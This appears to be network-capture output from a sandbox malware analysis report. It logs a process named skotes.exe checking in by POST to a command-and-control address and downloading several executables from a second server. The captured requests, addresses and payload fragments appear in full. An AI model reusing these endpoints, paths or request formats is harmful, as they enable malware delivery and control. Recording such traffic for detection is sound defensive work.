Dec 10, 2024 11:11:09.373390913 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373404026 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:09.373414040 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: TgxozPrp8vfkjr,/ZcWq,NT^mB\t1s4*/{y
Dec 10, 2024 11:11:09.373518944 CET	1236	IN	Data Raw: 9b 79 96 24 44 82 97 24 44 82 98 24 44 83 5d d2 2e cc 9a d1 16 cc 9b d1 16 cc 9c 27 5a 98 bc ac 34 9b 9e e3 61 4c a1 c6 6f 7f 77 de 2e fb 72 a0 68 68 73 6e 85 e8 8c 74 78 77 de 28 74 5e 6a 0a a7 61 31 bc 7a dc f2 70 6b da de 77 6a 92 28 76 82 67 Data Ascii: y$D$D$D].'Z4aLow.rhhsntxw(t^ja1zpkwj(vgp;HAkYu[}D;eHqmP]Iv^YAmth@oyuG%XA6**$qhQ IRrVWw
Dec 10, 2024 11:11:09.492839098 CET	1236	IN	Data Raw: f4 54 86 22 97 9c 92 29 95 6f 3f d8 ad 9a 79 86 92 a7 b4 bd 6c 92 f3 a3 64 2d 01 ca 7d 8f a7 bd 25 65 a4 dc 71 96 8a 08 f6 b7 41 cc b8 dd b4 a3 71 4c c1 72 6b 3e 08 d9 fb fa 3d c9 cf 7b 74 32 27 ac 1c 2b cd 4a 7b ce 86 14 b5 2c cd 83 7b 08 48 b7 Data Ascii: T")o?yld-}%eqAqLrk>={t2'+J{,{HwTp\|szt3.Lcu-\ow7V fv{gT?h^Ds#V^wV.s[kZ_>Fu]zouZ[n{BLg1r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49849	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:14.797059059 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013675001&unit=246122658369
Dec 10, 2024 11:11:16.133131027 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49850	185.215.113.16	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:16.272377014 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 11:11:17.627454996 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:17 GMT Content-Type: application/octet-stream Content-Length: 1839104 Last-Modified: Tue, 10 Dec 2024 09:49:16 GMT Connection: keep-alive ETag: "67580e9c-1c1000" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 b0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 48 00 00 04 00 00 a9 cb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUgH@H@\@p0A B@.rsrc0R@.idata @V@ )PX@zroyxpcd/Z@chhltftkH@.taggant0H"@
Dec 10, 2024 11:11:17.627485991 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:17.627873898 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:17.627914906 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:17.627924919 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:17.628521919 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:17.628587008 CET	1236	IN	Data Raw: f9 4b 12 be 57 bf 72 17 77 72 1f 5e 11 56 58 76 15 bd 0b 93 e1 12 54 cf 78 f9 52 36 c2 bf 36 77 aa 42 ca 04 84 b6 bb b0 0e 52 a0 5c b2 65 bb 70 c0 b7 e0 33 64 f6 16 2c 05 aa 06 b9 66 bf e4 03 74 ae 4d 54 09 af e2 e0 71 64 6c 37 0d 66 7e 31 4e fc Data Ascii: KWrwr^VXvTxR66wBR\ep3d,ftMTqdl7f~1NNw}\|rc5u-(93]7],jfbV+DB:Q0QV#&kHJ~Jp]<g0-_[7cwSZ!8p]u <rYc$
Dec 10, 2024 11:11:17.628596067 CET	248	IN	Data Raw: 62 43 03 74 4e a7 ec 29 1c 07 b1 89 97 d8 1a 93 8f 50 c5 2e d6 a3 dd 93 74 ae dd 02 ed f2 3d ac e0 d0 64 7b a0 cc dd 36 25 ba b0 73 da 15 af c7 59 ff c3 60 8d 45 1e 60 54 22 0a bf 66 16 1f 79 07 44 07 22 fa 44 08 54 5c d8 43 e8 f5 a9 cc c3 61 87 Data Ascii: bCtN)P.t=d{6%sY`E`T"fyD"DT\CaGB.:/EEL>a)j,)z_X1kh$Ck>60Ery,,LPQp(kNe-W~wQt8&EgVcPY\| "
Dec 10, 2024 11:11:17.629136086 CET	1236	IN	Data Raw: e1 f1 4a e4 35 ea af 24 60 7d 3f f8 5d f6 2b e0 d7 a3 2e 50 29 3f ec 0a 81 43 79 ed a1 1f 76 cc 73 d7 16 7d e1 bc ff fd 22 4b 8b 19 41 cd ba 5e ba 04 78 30 cc 93 31 b0 c1 c6 c1 b2 86 dd 6e 6d 6e ef e0 e5 41 b3 32 34 82 15 f1 b9 6e 5c c7 85 3e c2 Data Ascii: J5$`}?]+.P)?Cyvs}"KA^x01nmnA24n\>AGZ1f9.9dP1n4Zf_n>6g7iV9}<gCjfj<\;g"z=J83{:NXjGca&(#(OrA"iJ()
Dec 10, 2024 11:11:17.629266024 CET	1236	IN	Data Raw: a5 df 43 0f c3 b0 1f b7 76 63 f5 05 2e 31 1b bb 7e 66 ff 16 dd 57 a7 e6 16 c1 27 db 5e fb 1f 18 b1 1f e9 e3 e6 a6 1c d2 55 eb bc f7 e9 77 0b ff 04 7a d4 48 76 67 6c ea 79 4b f0 c3 6c ca 7f 09 77 94 73 f4 86 02 e2 2a e2 c8 a3 b4 d1 d2 fd cf 14 ce Data Ascii: Cvc.1~fW'^UwzHvglyKlws*&~sUCt70~R6@i_v3c:x7!90?pv)f0+M"n5v.NEqj\Mujj8z9P(vC[wg:3/h3H+3
Dec 10, 2024 11:11:17.747006893 CET	1236	IN	Data Raw: a6 ae b2 a5 5e fe 74 8d e0 ba 0f 8d a1 be c0 24 d0 ab 24 40 1c fd 79 af a1 6d 8c 2e ae 42 3d 1f d6 e3 cb d9 2c 28 77 b4 ed f8 0f e8 db 7d d7 46 ac ab 3f 98 bf a4 95 78 e1 cd fc 37 18 bd e2 f8 c2 a1 ff 46 45 05 81 e9 69 5a d5 4b 5d fe 71 fe 66 4e Data Ascii: ^t$$@ym.B=,(w}F?x7FEiZK]qfN}BmB.Fvxu2ma?/}(db]C,HmRG{ {7h!~C.bu<AGpZBn k9VYGLU&(GQb[1Tu.`v@lo~Mg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49868	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:23.117089033 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013676001&unit=246122658369
Dec 10, 2024 11:11:24.456459045 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49880	185.215.113.16	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:24.935839891 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 11:11:26.277425051 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:25 GMT Content-Type: application/octet-stream Content-Length: 1780224 Last-Modified: Tue, 10 Dec 2024 09:49:22 GMT Connection: keep-alive ETag: "67580ea2-1b2a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 07 d9 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(Ph@h@M$a$$ $h@.rsrc$x@.idata $z@ )$\|@razuzqfwN~@rexqpveb@h@.taggant0Ph"@
Dec 10, 2024 11:11:26.277551889 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:26.277565002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:26.277641058 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:26.277652979 CET	1236	IN	Data Raw: f6 79 b0 b6 b8 b1 54 13 f6 bc 97 aa c6 f4 70 7c 35 d0 0c 0a b9 ec 49 3a 41 f4 b4 51 55 70 1d 0d 09 32 05 54 39 2a 6d 7c f0 8e 7d f0 19 1a 7f 26 11 14 7d 2a ed 64 4d 66 c5 f4 d8 c2 9e cb c4 d2 f4 f8 d0 cd 2c 76 1d 2a f4 dc 48 42 5d d4 0c 2b 3b 1b Data Ascii: yTp\|5I:AQUp2T9m\|}&}dMf,vHB]+;8ae1p(+?mx{Kqv8P)Uvx]HV,mhu<`q{>cIm74nY4K5&U]:1U''#y66KbB!Iw
Dec 10, 2024 11:11:26.277664900 CET	1236	IN	Data Raw: 0b 0c 7f ee 55 e4 19 13 f2 fb 8d 47 c1 af fb bb e9 cc f0 e3 06 14 22 3b 7c 15 d2 99 05 c4 41 db ab 92 0f e1 3c 95 91 7a 18 89 d4 d7 70 8d 0c 76 40 49 0c 8d 9d ad 55 7a 3c 51 37 3c e4 fa 6e a5 7c 83 73 8a bc 65 0c 51 e5 6b 7f ad c4 94 0c b7 85 f5 Data Ascii: UG";\|A<zpv@IUz<Q7<n\|seQk>3V81M(yP P9y_5n;k/a+loP#_w1-Id7pNe{QzpT,=t2:gNPA"`rb
Dec 10, 2024 11:11:26.277677059 CET	1236	IN	Data Raw: f7 81 04 b6 0a 6c d4 8d bc c2 36 23 02 d3 f7 3c 0b 50 24 aa f5 63 9d 2f c7 b2 5c 23 79 f4 d0 9d cc 12 38 90 7d bc e4 20 71 70 d3 55 a1 b7 c8 6b 23 1e b7 2b 3d cc a0 06 e2 c0 45 2f 97 30 3d 12 ff d4 2e 26 d1 63 2d af 0a 3a 7d 0a 0b fc 64 b6 40 7b Data Ascii: l6#<P$c/\#y8} qpUk#+=E/0=.&c-:}d@{Mdbc\|@%b{z;UXIsFTr9(w+?/,vR#x$0%Ypsts.9#z}+S]\|&u T&$qV%Tl#,
Dec 10, 2024 11:11:26.277801037 CET	1236	IN	Data Raw: 3d a9 2e 0f d7 d8 ec be bd 55 0d 2e d4 75 e9 64 c5 c6 24 56 bd 43 4a 37 3a 9c 0c 20 b5 b7 14 3a 03 69 54 b1 04 c3 74 2b d9 70 73 26 5a 92 07 26 ad c6 d7 f9 3c c4 8d a2 e0 40 6c 1a 95 c6 72 ce 05 5c 88 1b 2b 89 0c 2a 5e 4f 2d 5c c5 80 07 12 d9 b2 Data Ascii: =.U.ud$VCJ7: :iTt+ps&Z&<@lr\+*^O-\dbs$"-'QB$mW+,6L77"LT v]4s KU 9<)=(\|?QXwR.RS<X'z\|/"z(\u{$}rp
Dec 10, 2024 11:11:26.277813911 CET	1236	IN	Data Raw: 99 fb f7 b8 06 87 27 26 f9 5e 31 20 05 a8 70 9e bc b4 d9 67 48 f4 2c 0e 89 a0 2e 13 d9 c7 2f b1 be ac 2e 22 c5 70 fd bf fc c1 4f 37 e9 8c 3b 20 d2 f4 38 a4 be ef 0b b1 7d 77 16 42 3f cb 1c 95 d5 cb 73 d6 06 4f b5 b7 0a 74 4d 19 a1 40 f7 20 bd 7c Data Ascii: '&^1 pgH,./."pO7; 8}wB?sOtM@ \|qVp~[L/RetS/<0qpTKYf7o6cxAt].\|C,zs/<ppM-'Hc\0b'u=z+#,^p@S/<,=tl/{;%#]0
Dec 10, 2024 11:11:26.277825117 CET	1116	IN	Data Raw: e8 c6 24 b6 b8 e8 8a 77 3b f2 51 48 5d 40 3c 7c b1 c3 18 a4 06 1f 34 0c 23 50 b1 20 a5 d2 9c bc 43 05 34 ab 60 28 74 23 15 7f 31 b0 2b c7 2e da 75 f3 c2 7d 49 70 29 ee 56 80 b3 7c dc d2 2e d6 05 18 0d da d5 b2 a3 3a 04 7c aa b2 0a f4 4b ba 58 7f Data Ascii: $w;QH]@<\|4#P C4`(t#1+.u}Ip)V\|.:\|KXI/GH,Qw<=v[p:psvde646U\|G% ]v6jpxL/*{Q!^&u-csx!qp r:p!{I<0o$Ac],9(BK
Dec 10, 2024 11:11:26.406848907 CET	1236	IN	Data Raw: 8d 72 21 bf 6e 61 d1 6e 69 ec 36 1c 37 fc 02 4b 64 a0 f8 13 04 02 da 61 d6 79 88 55 4d ad fa 3b a4 c8 80 4c 2d d2 59 66 84 af ea 35 a2 ce 52 2e 0f 79 9b 0f ef 80 c9 08 a9 34 39 63 b4 ff 8a 1c 6c 05 26 3a cd 78 49 94 6e 81 d7 28 5a 90 c6 aa 70 ad Data Ascii: r!nani67KdayUM;L-Yf5R.y49cl&:xIn(ZpYj3wa}._~p?F2\|LT=j1m I(A9a> `8fvFw9PAl<Uvh:E:e9y$sPo":n<P<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49906	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:33.072653055 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013677001&unit=246122658369
Dec 10, 2024 11:11:34.430464029 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49914	185.215.113.16	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:34.556278944 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 11:11:35.887729883 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:35 GMT Content-Type: application/octet-stream Content-Length: 968192 Last-Modified: Tue, 10 Dec 2024 09:47:33 GMT Connection: keep-alive ETag: "67580e35-ec600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2d 0e 58 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL-Xg"w@ @@@d\|@Zu4@.text `.rdata@@.datalpH@.rsrcZ@\@@.relocuvP@B
Dec 10, 2024 11:11:35.887809038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 10, 2024 11:11:35.887820005 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 10, 2024 11:11:35.887830019 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 10, 2024 11:11:35.887870073 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 10, 2024 11:11:35.887881041 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 10, 2024 11:11:35.887892008 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 10, 2024 11:11:35.888072968 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 10, 2024 11:11:35.888108969 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 10, 2024 11:11:35.888119936 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
